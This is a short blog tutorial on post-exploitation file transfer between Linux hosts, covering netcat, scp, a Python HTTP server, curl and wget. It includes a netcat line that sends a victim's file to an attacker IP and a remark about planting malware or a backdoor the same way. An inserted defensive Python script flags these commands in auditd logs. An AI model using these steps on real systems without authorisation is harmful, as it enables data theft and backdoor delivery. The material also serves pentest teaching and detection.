Post Exploitation: Transferring Files Between Linux Hosts

Ravindu Thomas
SLIIT FOSS Community
3 min read · Aug 14, 2022

After taking over a PC by exploiting a vulnerability, you might wonder how to transfer files remotely from the victim to your host machine.

In this article I'll be guiding you through some common methodologies I have used to transfer files between the host and the victim’s machine.

Note: These methods are for Linux operating systems.

Netcat

An easy one, and my favorite.

Netcat is usually known as the ‘Swiss Army knife’ of a hacker.

As Netcat is installed on most Linux operating systems by default, we can use that to our advantage.

Let’s say the victim machine has a file called user.txt and we want that file on our host/attacking machine.

Here is how to do it:

Open a listener on the host machine and redirect its output to a filename.

Match the file extension to the file on the victim’s machine.

If the victim’s machine has a ‘.rar’ file, then change the extension to ‘.rar’.

nc -lvnp 4444 > user.txt
Figure 1

Now, from the victim’s machine, send the file via Netcat.

nc 10.8.6.184 4444 -w 3 < user.txt
Figure 2

What we did above is send user.txt from the victim machine’s current directory via Netcat to the host machine.

SCP

To do this you need three things:

  • victim’s username,
  • password,
  • and the SSH port should be opened.

Let’s say the username on the victim’s machine is mitch, the SSH port is 2222, the file user.txt is in /home/mitch/, and we need to save it on the host machine in ‘/home/frosky/’.

From the host machine type the following command.

scp -P 2222 mitch@10.10.45.168:/home/mitch/user.txt /home/frosky/
Figure 3

Python server

You can start a simple HTTP server that serves files from the current directory you are in.

From the victim’s machine type the following command.

python -m SimpleHTTPServer 8080
Figure 4

SimpleHTTPServer is the Python 2 module name; on Python 3 the equivalent module is http.server.

Note: Here we use a different port rather than the default HTTP port 80. In that case the chosen port must be allowed through the firewall, if a firewall is present on the victim’s machine.

If you want to start an HTTP server on port 8080, you should allow port 8080 through the firewall using:

ufw allow 8080
Figure 5

Note: To add a firewall rule you need to be root on the victim’s machine.

After starting the server with the steps above, run the ‘curl’ command as below:

curl -o user.txt http://10.10.37.169:8080/user.txt
Figure 6

Alternatively, you can run the ‘wget’ command if ‘wget’ is installed on the victim’s machine.

wget http://10.10.37.169:8080/user.txt
Figure 7

This also works the other way around!

Say you want to upload a malware file or a persistent backdoor to the victim’s machine: just do the above steps the other way around.

Simply swap the victim machine’s commands with the host machine’s commands.
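Seen from the defender's side, the Netcat and Python HTTP server transfers above each leave a recognisable command line in process-execution logs. The following is an added example, not part of the original article: it parses auditd EXECVE records and flags those commands. The sample records, rule names and function names are constructed for illustration.

```python
import re

# Constructed auditd EXECVE records (sample data, not taken from the article).
SAMPLE_LOG = """\
type=EXECVE msg=audit(1660460001.101:201): argc=3 a0="nc" a1="-lvnp" a2="4444"
type=EXECVE msg=audit(1660460002.102:202): argc=5 a0="nc" a1="10.8.6.184" a2="4444" a3="-w" a4="3"
type=EXECVE msg=audit(1660460003.103:203): argc=4 a0="python" a1="-m" a2="SimpleHTTPServer" a3="8080"
type=EXECVE msg=audit(1660460004.104:204): argc=3 a0="ufw" a1="allow" a2="8080"
type=EXECVE msg=audit(1660460005.105:205): argc=4 a0="curl" a1="-o" a2="user.txt" a3="http://10.10.37.169:8080/user.txt"
type=EXECVE msg=audit(1660460006.106:206): argc=2 a0="ls" a1="-la"
type=EXECVE msg=audit(1660460007.107:207): argc=2 a0="wget" a1="https://example.com/index.html"
"""
ARG_RE = re.compile(r'\ba(\d+)="([^"]*)"')            # a0="nc", a1="-lvnp", ...
EVENT_RE = re.compile(r'msg=audit\(([\d.]+):(\d+)\)')  # timestamp:event-id
URL_PORT_RE = re.compile(r'^https?://[^/:]+:(\d+)')    # URL with an explicit port

def parse_execve(line):
    """Return (event_id, argv) for an EXECVE record, or None for anything else."""
    m = EVENT_RE.search(line)
    if not line.startswith("type=EXECVE") or not m:
        return None
    args = sorted((int(i), v) for i, v in ARG_RE.findall(line))
    return int(m.group(2)), [v for _, v in args]

def classify(argv):
    """Return a rule name if argv matches a transfer method from the article."""
    if not argv:
        return None
    prog, rest = argv[0].rsplit("/", 1)[-1], argv[1:]
    if prog in ("nc", "ncat", "netcat"):
        listening = any(a.startswith("-") and not a.startswith("--") and "l" in a for a in rest)
        return "netcat-listener" if listening else "netcat-connect"
    if prog.startswith("python") and "-m" in rest[:-1]:
        if rest[rest.index("-m") + 1] in ("SimpleHTTPServer", "http.server"):
            return "adhoc-http-server"
    if prog == "ufw" and rest[:1] == ["allow"]:
        return "firewall-port-opened"
    if prog in ("curl", "wget"):
        for a in rest:
            m = URL_PORT_RE.match(a)
            if m and m.group(1) not in ("80", "443"):
                return "http-fetch-nonstandard-port"
    return None

def detect(log_text):
    """Return [(event_id, rule)] for every flagged EXECVE record in log_text."""
    events = (parse_execve(line) for line in log_text.splitlines())
    return [(eid, classify(argv)) for eid, argv in filter(None, events) if classify(argv)]
```

Shell redirections such as `> user.txt` never appear in the EXECVE arguments, so the rules key on the program name and its options only.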

If you know more methods to share files between hosts, don’t hesitate to comment.

If you like this article, please leave me a clap or two, and don’t forget to follow me as well.

Find me on YouTube;

Ravindu Thomas
SLIIT FOSS Community

Pentester | InfoSec Enthusiast | Cyber Security Researcher